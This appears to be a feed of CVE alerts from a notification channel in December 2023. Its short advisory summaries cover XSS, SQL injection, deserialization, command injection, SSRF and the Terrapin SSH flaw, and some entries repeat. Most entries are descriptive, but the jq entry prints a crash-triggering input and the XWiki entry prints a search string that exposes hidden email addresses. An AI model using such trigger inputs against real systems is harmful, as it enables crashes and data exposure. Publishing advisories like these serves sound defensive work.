🚨 CVE-2023-51457Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-12-20 14:54:43 |
🚨 CVE-2023-47507Deserialization of Untrusted Data vulnerability in Master Slider Master Slider Pro.This issue affects Master Slider Pro: from n/a through 3.6.5.🎖@cveNotify |
|
| 2023-12-20 14:54:39 |
🚨 CVE-2023-46311Authorization Bypass Through User-Controlled Key vulnerability in gVectors Team Comments – wpDiscuz.This issue affects Comments – wpDiscuz: from n/a through 7.6.3.🎖@cveNotify |
|
| 2023-12-20 14:54:38 |
🚨 CVE-2023-40555Deserialization of Untrusted Data vulnerability in UX-themes Flatsome | Multi-Purpose Responsive WooCommerce Theme.This issue affects Flatsome | Multi-Purpose Responsive WooCommerce Theme: from n/a through 3.17.5.🎖@cveNotify |
|
| 2023-12-20 14:54:33 |
🚨 CVE-2023-38513Authorization Bypass Through User-Controlled Key vulnerability in Jordy Meow Photo Engine (Media Organizer & Lightroom).This issue affects Photo Engine (Media Organizer & Lightroom): from n/a through 6.2.5.🎖@cveNotify |
|
| 2023-12-20 14:54:32 |
🚨 CVE-2023-37871Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce GoCardless.This issue affects GoCardless: from n/a through 2.5.6.🎖@cveNotify |
|
| 2023-12-20 14:24:50 |
🚨 CVE-2023-51461Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-12-20 14:24:44 |
🚨 CVE-2023-51460Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-12-20 14:24:43 |
🚨 CVE-2023-51457Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-12-20 14:24:42 |
🚨 CVE-2023-50249Sentry-Javascript is official Sentry SDKs for JavaScript. A ReDoS (Regular expression Denial of Service) vulnerability has been identified in Sentry's Astro SDK 7.78.0-7.86.0. Under certain conditions, this vulnerability allows an attacker to cause excessive computation times on the server, leading to denial of service (DoS). This vulnerability has been patched in sentry/astro version 7.87.0.🎖@cveNotify |
|
| 2023-12-20 14:24:39 |
🚨 CVE-2023-47507Deserialization of Untrusted Data vulnerability in Master Slider Master Slider Pro.This issue affects Master Slider Pro: from n/a through 3.6.5.🎖@cveNotify |
|
| 2023-12-20 14:24:38 |
🚨 CVE-2023-46147Deserialization of Untrusted Data vulnerability in Themify Themify Ultra.This issue affects Themify Ultra: from n/a through 7.3.5.🎖@cveNotify |
|
| 2023-12-20 14:24:37 |
🚨 CVE-2023-41796Authorization Bypass Through User-Controlled Key vulnerability in WP Sunshine Sunshine Photo Cart: Free Client Galleries for Photographers.This issue affects Sunshine Photo Cart: Free Client Galleries for Photographers: from n/a before 3.0.0.🎖@cveNotify |
|
| 2023-12-20 14:24:33 |
🚨 CVE-2023-38513Authorization Bypass Through User-Controlled Key vulnerability in Jordy Meow Photo Engine (Media Organizer & Lightroom).This issue affects Photo Engine (Media Organizer & Lightroom): from n/a through 6.2.5.🎖@cveNotify |
|
| 2023-12-20 14:24:32 |
🚨 CVE-2023-50917MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.🎖@cveNotify |
|
| 2023-12-20 13:54:51 |
🚨 CVE-2023-48764Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in GuardGiant Brute Force Protection WordPress Brute Force Protection – Stop Brute Force Attacks.This issue affects WordPress Brute Force Protection – Stop Brute Force Attacks: from n/a through 2.2.5.🎖@cveNotify |
|
| 2023-12-20 13:54:50 |
🚨 CVE-2023-48738Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Porto Theme Porto Theme - Functionality.This issue affects Porto Theme - Functionality: from n/a before 2.12.1.🎖@cveNotify |
|
| 2023-12-20 13:24:32 |
🚨 CVE-2023-6562JPX Fragment List (flst) box vulnerability in Kakadu 7.9 allows an attacker to exfiltrate local and remote files reachable by a server if the server allows the attacker to upload a specially-crafted the image that is displayed back to the attacker.🎖@cveNotify |
|
| 2023-12-20 12:24:32 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD 1.3.9rc1, ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust; and there could be effects on Bitvise SSH through 9.31.🎖@cveNotify |
|
| 2023-12-20 10:24:33 |
🚨 CVE-2023-6910A vulnerable API method in M-Files Server before 23.12.13195.0 allows for uncontrolled resource consumption. Authenticated attacker can exhaust server storage space to a point where the server can no longer serve requests.🎖@cveNotify |
|
| 2023-12-20 10:24:32 |
🚨 CVE-2022-42003In FasterXML jackson-databind before versions 2.13.4.1 and 2.12.17.1, resource exhaustion can occur because of a lack of a check in primitive value deserializers to avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled.🎖@cveNotify |
|
| 2023-12-20 09:24:33 |
🚨 CVE-2023-50628Buffer Overflow vulnerability in libming version 0.4.8, allows attackers to execute arbitrary code and obtain sensitive information via parser.c component.🎖@cveNotify |
|
| 2023-12-20 09:24:32 |
🚨 CVE-2023-49355decToString in decNumber/decNumber.c in jq 88f01a7 has a one-byte out-of-bounds write via the " []-1.2e-1111111111" input. NOTE: this is not the same as CVE-2023-50246. The CVE-2023-50246 71c2ab5 reference mentions -10E-1000010001, which is not in normalized scientific notation.🎖@cveNotify |
|
| 2023-12-20 08:24:32 |
🚨 CVE-2021-4104JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.🎖@cveNotify |
|
| 2023-12-20 07:24:32 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD 1.3.9rc1, ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust; and there could be effects on Bitvise SSH through 9.31.🎖@cveNotify |
|
| 2023-12-20 06:24:33 |
🚨 CVE-2023-6977This vulnerability enables malicious users to read sensitive files on the server.🎖@cveNotify |
|
| 2023-12-20 06:24:32 |
🚨 CVE-2023-6974A malicious user could use this issue to access internal HTTP(s) servers and in the worst case (ie: aws instance) it could be abuse to get a remote code execution on the victim machine.🎖@cveNotify |
|
| 2023-12-20 04:54:38 |
🚨 CVE-2023-49844Cross-Site Request Forgery (CSRF) vulnerability in Kevin Ohashi WPPerformanceTester.This issue affects WPPerformanceTester: from n/a through 2.0.0.🎖@cveNotify |
|
| 2023-12-20 04:54:37 |
🚨 CVE-2023-49843Cross-Site Request Forgery (CSRF) vulnerability in QuanticEdge First Order Discount Woocommerce.This issue affects First Order Discount Woocommerce: from n/a through 1.21.🎖@cveNotify |
|
| 2023-12-20 04:54:33 |
🚨 CVE-2023-50372Cross-Site Request Forgery (CSRF) vulnerability in Hiroaki Miyashita Custom Post Type Page Template.This issue affects Custom Post Type Page Template: from n/a through 1.1.🎖@cveNotify |
|
| 2023-12-20 04:54:32 |
🚨 CVE-2023-49834Cross-Site Request Forgery (CSRF) vulnerability in realmag777 FOX – Currency Switcher Professional for WooCommerce.This issue affects FOX – Currency Switcher Professional for WooCommerce: from n/a through 1.4.1.4.🎖@cveNotify |
|
| 2023-12-20 04:24:45 |
🚨 CVE-2023-49769Cross-Site Request Forgery (CSRF) vulnerability in SoftLab Integrate Google Drive.This issue affects Integrate Google Drive: from n/a through 1.3.4.🎖@cveNotify |
|
| 2023-12-20 04:24:39 |
🚨 CVE-2023-49751Cross-Site Request Forgery (CSRF) vulnerability in Ciprian Popescu Block for Font Awesome.This issue affects Block for Font Awesome: from n/a through 1.4.0.🎖@cveNotify |
|
| 2023-12-20 04:24:38 |
🚨 CVE-2023-6559The MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.🎖@cveNotify |
|
| 2023-12-20 04:24:37 |
🚨 CVE-2023-6853A vulnerability classified as critical was found in kalcaddle KodExplorer up to 4.51.03. Affected by this vulnerability is the function index of the file plugins/officeLive/app.php. The manipulation of the argument path leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The identifier of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier VDB-248221 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-20 04:24:33 |
🚨 CVE-2023-6851A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been rated as critical. This issue affects the function unzipList of the file plugins/zipView/app.php of the component ZIP Archive Handler. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is named 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248219.🎖@cveNotify |
|
| 2023-12-20 04:24:32 |
🚨 CVE-2023-6848A vulnerability was found in kalcaddle kodbox up to 1.48. It has been declared as critical. Affected by this vulnerability is the function check of the file plugins/officeViewer/controller/libreOffice/index.class.php. The manipulation of the argument soffice leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The identifier of the patch is 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. The identifier VDB-248209 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-20 02:54:45 |
🚨 CVE-2023-29030A cross site scripting vulnerability was discovered in Rockwell Automation's ArmorStart ST product that could potentially allow a malicious user to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful exploitation of this vulnerability.🎖@cveNotify |
|
| 2023-12-20 02:54:38 |
🚨 CVE-2015-10102A vulnerability, which was classified as critical, has been found in Freshdesk Plugin 1.7 on WordPress. Affected by this issue is some unknown functionality. The manipulation leads to open redirect. The attack may be launched remotely. Upgrading to version 1.8 is able to address this issue. The patch is identified as 2aaecd4e0c7c6c1dc4e6a593163d5f7aa0fa5d5b. It is recommended to upgrade the affected component. VDB-226118 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-20 02:54:37 |
🚨 CVE-2015-10100A vulnerability, which was classified as critical, has been found in Dynamic Widgets Plugin up to 1.5.10 on WordPress. This issue affects some unknown processing of the file classes/dynwid_class.php. The manipulation leads to sql injection. The attack may be initiated remotely. Upgrading to version 1.5.11 is able to address this issue. The identifier of the patch is d0a19c6efcdc86d7093b369bc9e29a0629e57795. It is recommended to upgrade the affected component. The identifier VDB-225353 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-20 02:54:33 |
🚨 CVE-2015-10097A vulnerability was found in grinnellplans-php up to 3.0. It has been declared as critical. Affected by this vulnerability is the function interface_disp_page/interface_disp_page of the file read.php. The manipulation leads to sql injection. The attack can be launched remotely. The identifier of the patch is 57e4409e19203a94495140ff1b5a697734d17cfb. It is recommended to apply a patch to fix this issue. The identifier VDB-223801 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-20 02:54:32 |
🚨 CVE-2017-20180A vulnerability classified as critical has been found in Zerocoin libzerocoin. Affected is the function CoinSpend::CoinSpend of the file CoinSpend.cpp of the component Proof Handler. The manipulation leads to insufficient verification of data authenticity. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The patch is identified as ce103a09ec079d0a0ed95475992348bed6e860de. It is recommended to apply a patch to fix this issue. VDB-222318 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-20 02:24:40 |
🚨 CVE-2015-10091A vulnerability has been found in ByWater Solutions bywater-koha-xslt and classified as critical. This vulnerability affects the function StringSearch of the file admin/systempreferences.pl. The manipulation of the argument name leads to sql injection. The attack can be initiated remotely. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The patch is identified as 9513b93c828dfbc4413f9e0df63647401aaf4e58. It is recommended to apply a patch to fix this issue. VDB-222322 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-20 02:24:33 |
🚨 CVE-2017-20167A vulnerability, which was classified as problematic, was found in Minichan. This affects an unknown part of the file reports.php. The manipulation of the argument headline leads to cross site scripting. It is possible to initiate the attack remotely. The identifier of the patch is fc0e732e58630cba318d6bf49d1388a7aa9d390e. It is recommended to apply a patch to fix this issue. The identifier VDB-217785 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-20 02:24:32 |
🚨 CVE-2022-24480Outlook for Android Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-12-20 01:54:38 |
🚨 CVE-2015-10094A vulnerability was found in Fastly Plugin up to 0.97 on WordPress. It has been rated as problematic. Affected by this issue is the function post of the file lib/api.php. The manipulation of the argument url leads to cross site scripting. The attack may be launched remotely. Upgrading to version 0.98 is able to address this issue. The patch is identified as d7fe42538f4d4af500e3af9678b6b06fba731656. It is recommended to upgrade the affected component. VDB-222326 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-20 01:54:33 |
🚨 CVE-2014-125067A vulnerability classified as critical was found in corincerami curiosity. Affected by this vulnerability is an unknown functionality of the file app/controllers/image_controller.rb. The manipulation of the argument sol leads to sql injection. The patch is named d64fddd74ca72714e73f4efe24259ca05c8190eb. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217639.🎖@cveNotify |
|
| 2023-12-20 01:54:32 |
🚨 CVE-2013-4584Perdition before 2.2 may have weak security when handling outbound connections, caused by an error in the STARTTLS IMAP and POP server. ssl_outgoing_ciphers not being applied to STARTTLS connections🎖@cveNotify |
|
| 2023-12-20 01:24:38 |
🚨 CVE-2023-47706IBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to upload files of a dangerous file type. IBM X-Force ID: 271341.🎖@cveNotify |
|
| 2023-12-20 01:24:33 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD 1.3.9rc1, ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust; and there could be effects on Bitvise SSH through 9.31.🎖@cveNotify |
|
| 2023-12-20 01:24:32 |
🚨 CVE-2023-47271PKP-WAL (aka PKP Web Application Library or pkp-lib) before 3.3.0-16, as used in Open Journal Systems (OJS) and other products, does not verify that the file named in an XML document (used for the native import/export plugin) is an image file, before trying to use it for an issue cover image.🎖@cveNotify |
|
| 2023-12-20 00:24:39 |
🚨 CVE-2023-50707Through the exploitation of active user sessions, an attacker could send custom requests to cause a denial-of-service condition on the device.🎖@cveNotify |
|
| 2023-12-20 00:24:38 |
🚨 CVE-2023-50704An attacker could construct a URL within the application that causes a redirection to an arbitrary external domain and could be leveraged to facilitate phishing attacks against application users.🎖@cveNotify |
|
| 2023-12-20 00:24:33 |
🚨 CVE-2023-47161IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion. IBM X-Force ID: 270799.🎖@cveNotify |
|
| 2023-12-20 00:24:32 |
🚨 CVE-2023-42012An IBM UrbanCode Deploy Agent 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts. IBM X-Force ID: 265509.🎖@cveNotify |
|
| 2023-12-19 23:24:38 |
🚨 CVE-2023-49147An issue was discovered in PDF24 Creator 11.14.0. The configuration of the msi installer file was found to produce a visible cmd.exe window when using the repair function of msiexec.exe. This allows an unprivileged local attacker to use a chain of actions (e.g., an oplock on faxPrnInst.log) to open a SYSTEM cmd.exe.🎖@cveNotify |
|
| 2023-12-19 23:24:37 |
🚨 CVE-2023-45172IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in AIX windows to cause a denial of service. IBM X-Force ID: 267970.🎖@cveNotify |
|
| 2023-12-19 23:24:33 |
🚨 CVE-2023-50917MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.🎖@cveNotify |
|
| 2023-12-19 23:24:32 |
🚨 CVE-2023-49159Server-Side Request Forgery (SSRF) vulnerability in Elegant Digital Solutions CommentLuv.This issue affects CommentLuv: from n/a through 3.0.4.🎖@cveNotify |
|
| 2023-12-19 22:24:38 |
🚨 CVE-2023-49004An issue in D-Link DIR-850L v.B1_FW223WWb01 allows a remote attacker to execute arbitrary code via a crafted script to the en parameter.🎖@cveNotify |
|
| 2023-12-19 22:24:37 |
🚨 CVE-2023-47267An issue discovered in TheGreenBow Windows Enterprise Certified VPN Client 6.52, Windows Standard VPN Client 6.87, and Windows Enterprise VPN Client 6.87 allows attackers to gain escalated privileges via crafted changes to memory mapped file.🎖@cveNotify |
|
| 2023-12-19 22:24:33 |
🚨 CVE-2023-47146IBM Qradar SIEM 7.5 could allow a privileged user to obtain sensitive domain information due to data being misidentified. IBM X-Force ID: 270372.🎖@cveNotify |
|
| 2023-12-19 22:24:32 |
🚨 CVE-2022-43450Authorization Bypass Through User-Controlled Key vulnerability in XWP Stream.This issue affects Stream: from n/a through 3.9.2.🎖@cveNotify |
|
| 2023-12-19 21:54:32 |
🚨 CVE-2023-3904An issue has been discovered in GitLab EE affecting all versions starting before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible to overflow the time spent on an issue that altered the details shown in the issue boards.🎖@cveNotify |
|
| 2023-12-19 21:24:45 |
🚨 CVE-2023-49750Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Spoonthemes Couponis - Affiliate & Submitting Coupons WordPress Theme.This issue affects Couponis - Affiliate & Submitting Coupons WordPress Theme: from n/a before 2.2.🎖@cveNotify |
|
| 2023-12-19 21:24:39 |
🚨 CVE-2023-48764Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in GuardGiant Brute Force Protection WordPress Brute Force Protection – Stop Brute Force Attacks.This issue affects WordPress Brute Force Protection – Stop Brute Force Attacks: from n/a through 2.2.5.🎖@cveNotify |
|
| 2023-12-19 21:24:38 |
🚨 CVE-2023-48327Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WC Vendors WC Vendors – WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors.This issue affects WC Vendors – WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors: from n/a through 2.4.7.🎖@cveNotify |
|
| 2023-12-19 21:24:37 |
🚨 CVE-2023-37982URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms.This issue affects Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms: from n/a through 1.3.3.🎖@cveNotify |
|
| 2023-12-19 21:24:33 |
🚨 CVE-2023-43826Apache Guacamole 1.5.3 and older do not consistently ensure that values received from a VNC server will not result in integer overflow. If a user connects to a malicious or compromised VNC server, specially-crafted data could result in memory corruption, possibly allowing arbitrary code to be executed with the privileges of the running guacd process.Users are recommended to upgrade to version 1.5.4, which fixes this issue.🎖@cveNotify |
|
| 2023-12-19 21:24:32 |
🚨 CVE-2023-6265** UNSUPPORTED WHEN ASSIGNED ** Draytek Vigor2960 v1.5.1.4 and v1.5.1.5 are vulnerable to directory traversal via the mainfunction.cgi dumpSyslog 'option' parameter allowing an authenticated attacker with access to the web management interface to delete arbitrary files. Vigor2960 is no longer supported.🎖@cveNotify |
|
| 2023-12-19 20:54:51 |
🚨 CVE-2023-50264Bazarr manages and downloads subtitles. Prior to 1.3.1, Bazarr contains an arbitrary file read in /system/backup/download/ endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1.🎖@cveNotify |
|
| 2023-12-19 20:54:50 |
🚨 CVE-2023-50722XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, there is a reflected XSS or also direct remote code execution vulnerability in the code for displaying configurable admin sections. The code that can be passed through a URL parameter is only executed when the user who is visiting the crafted URL has edit right on at least one configuration section. While any user of the wiki could easily create such a section, this vulnerability doesn't require the attacker to have an account or any access on the wiki. It is sufficient to trick any admin user of the XWiki installation to visit the crafted URL. This vulnerability allows full remote code execution with programming rights and thus impacts the confidentiality, integrity and availability of the whole XWiki installation. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patch can be manually applied to the document `XWiki.ConfigurableClass`.🎖@cveNotify |
|
| 2023-12-19 20:54:45 |
🚨 CVE-2023-50720XWiki Platform is a generic wiki platform. Prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for `objcontent:email*` using XWiki's regular search interface. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-19 20:54:44 |
🚨 CVE-2023-50089A Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication.🎖@cveNotify |
|
| 2023-12-19 20:24:45 |
🚨 CVE-2023-45105URL Redirection to Untrusted Site ('Open Redirect') vulnerability in SERVIT Software Solutions affiliate-toolkit – WordPress Affiliate Plugin.This issue affects affiliate-toolkit – WordPress Affiliate Plugin: from n/a through 3.3.9.🎖@cveNotify |
|
| 2023-12-19 20:24:38 |
🚨 CVE-2023-38481URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin.This issue affects Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin: from n/a before 1.3.7.🎖@cveNotify |
|
| 2023-12-19 20:24:37 |
🚨 CVE-2023-38478URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks Integration for WooCommerce and QuickBooks.This issue affects Integration for WooCommerce and QuickBooks: from n/a through 1.2.3.🎖@cveNotify |
|
| 2023-12-19 20:24:33 |
🚨 CVE-2023-34027Deserialization of Untrusted Data vulnerability in Rajnish Arora Recently Viewed Products.This issue affects Recently Viewed Products: from n/a through 1.0.0.🎖@cveNotify |
|
| 2023-12-19 20:24:32 |
🚨 CVE-2023-49187Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spoonthemes Adifier - Classified Ads WordPress Theme allows Reflected XSS.This issue affects Adifier - Classified Ads WordPress Theme: from n/a before 3.1.4.🎖@cveNotify |
|
| 2023-12-19 19:54:38 |
🚨 CVE-2023-49180Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ternstyle LLC Automatic Youtube Video Posts Plugin allows Stored XSS.This issue affects Automatic Youtube Video Posts Plugin: from n/a through 5.2.2.🎖@cveNotify |
|
| 2023-12-19 19:54:37 |
🚨 CVE-2023-49176Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeRevolution WP Pocket URLs allows Reflected XSS.This issue affects WP Pocket URLs: from n/a through 1.0.2.🎖@cveNotify |
|
| 2023-12-19 19:54:33 |
🚨 CVE-2023-49174Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS.This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5.🎖@cveNotify |
|
| 2023-12-19 19:54:32 |
🚨 CVE-2023-25648There is a weak folder permission vulnerability in ZTE's ZXCLOUD iRAI product. Due to weak folder permission, an attacker with ordinary user privileges could construct a fake DLL to execute command to escalate local privileges.🎖@cveNotify |
|
| 2023-12-19 19:24:40 |
🚨 CVE-2023-1904In affected versions of Octopus Server it is possible for the OpenID client secret to be logged in clear text during the configuration of Octopus Server.🎖@cveNotify |
|
| 2023-12-19 19:24:34 |
🚨 CVE-2023-44709PlutoSVG commit 336c02997277a1888e6ccbbbe674551a0582e5c4 and before was discovered to contain an integer overflow via the component plutosvg_load_from_memory.🎖@cveNotify |
|
| 2023-12-19 19:24:33 |
🚨 CVE-2023-50247h2o is an HTTP server with support for HTTP/1.x, HTTP/2 and HTTP/3. The QUIC stack (quicly), as used by H2O up to commit 43f86e5 (in version 2.3.0-beta and prior), is susceptible to a state exhaustion attack. When H2O is serving HTTP/3, a remote attacker can exploit this vulnerability to progressively increase the memory retained by the QUIC stack. This can eventually cause H2O to abort due to memory exhaustion. The vulnerability has been resolved in commit d67e81d03be12a9d53dc8271af6530f40164cd35. HTTP/1 and HTTP/2 are not affected by this vulnerability as they do not use QUIC. Administrators looking to mitigate this issue without upgrading can disable HTTP/3 support.🎖@cveNotify |
|
| 2023-12-19 19:24:32 |
